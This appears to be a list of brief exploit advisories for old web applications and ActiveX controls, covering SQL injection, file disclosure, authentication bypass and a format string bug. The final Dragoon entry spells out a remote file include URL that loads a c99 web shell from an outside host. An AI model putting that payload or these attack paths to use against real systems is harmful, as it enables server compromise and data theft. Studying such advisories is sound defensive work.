phpTournois is vulnerable to a Remote File Upload/Code Execution vulnerability. When testing if we are admin, phpTournois checks if $grade['a']=='a'. But when we are not loggued in, this var is not defined. So, using register_globals, we can define it and let the CMS think we are authentificated. Using configuration zone and avatar upload, we can do a LFI, and then everything is possible.
An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. This can allow the attacker to pull admin/user info from the database, as well as upload a malicious shell.
My Gaming Ladder 7.5 and prior versions are vulnerable to SQL injection attacks. An attacker can exploit this vulnerability to gain access to the admin/user information stored in the database. The exploit involves sending a specially crafted SQL query to the vulnerable parameter 'ladderid' in the 'ladder.php' script. The query will return the admin/user information in plaintext. The admin login is located at '/adminhome.php' and the passwords are in plaintext.
724CMS version 4.01 Enterprise is vulnerable to SQL injection. The vulnerability exists in the 'ID' GET parameter of the 'index.php' document. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The number of columns isn't always 28. In some cases it can be also about 37. Check before you try. Some of 'em are blind injections.
A vulnerability exists in ChartDirector Ver 4.1, which allows a remote attacker to disclose sensitive information. This is due to a failure in the application to properly sanitize user-supplied input to the 'file' parameter of the 'viewsource.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request containing a specially crafted 'file' parameter to the vulnerable script. This will disclose the source code of the specified file.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Tumbleweed Communications SecureTransport FileTransfer ActiveX Control. User interaction is required to exploit this vulnerabiliy in that the target must visit a malicious page or open a malicious file.
The ovalarmsrv.exe process listening on port 2953 is affected by a format string vulnerability caused by the calling of ov.fprintf_new (which then calls vsprintf) using the final message without a format argument. The same process listens also on port 2954 where are handled some types of requests using specific sscanf formats. The same process is affected by a Denial of Service caused by the sending of a malformed packet on port 2954.
Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) is vulnerable to multiple insecure methods. An attacker can exploit this vulnerability by using a malicious VBScript code to execute arbitrary code on the vulnerable system. The vulnerable methods are Save, SaveLayoutChanges and SaveMenuUsageData. An attacker can use these methods to write arbitrary files to the system.
Mole v2.1.0 is vulnerable to a remote file disclosure vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to view sensitive files on the server, such as configuration files, source code, and other sensitive information.
Dragoon 0.1 is vulnerable to a remote file include vulnerability. The vulnerable code is located in the header.inc.php file in line 23. The exploit is to send a malicious URL to the vulnerable file, such as http://WwW.4RxH.CoM/PHP/includes/header.inc.php?root=http://rxh.freehostia.com/shells/c99in.txt?
Services By CQR